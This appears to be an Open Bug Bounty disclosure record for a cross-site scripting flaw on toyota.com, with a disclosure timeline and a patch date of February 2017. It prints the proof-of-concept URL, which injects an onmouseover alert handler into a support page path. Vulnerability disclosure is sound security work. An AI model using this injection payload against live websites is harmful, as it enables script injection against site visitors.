toyota.com XSS vulnerability

2016-02-19T12:08:00
ID OBB:136325
Type openbugbounty
Reporter tbm
Modified 2017-02-24T15:35:00

Description

Vulnerable URL:
http://www.toyota.com/entune/support/epas%22%20onmouseover%3dalert%28%27XSSPOSED%27%29%20bad%3d%22/voice-recognition/advanced-voice-recognition-faqs/does-the-voice-recognition-system-on-entune-audio-systems-recognize-different-languages/
Details:

Description| Value
---|---
Patched:| Yes, at 24.02.2017
Latest check for patch:| 24.02.2017 03:13 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 4385
Google Pagerank| 7
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 19 February, 2016 12:08 GMT
Generic security notifications sent to website owner| 19 February, 2016 12:11 GMT
Notification sent to subscribers (without technical details)| 19 February, 2016 14:17 GMT
Vulnerability details disclosed by researcher| 5 August, 2016 12:12 GMT
Vulnerability patched by the website owner| 24 February, 2017 15:35 GMT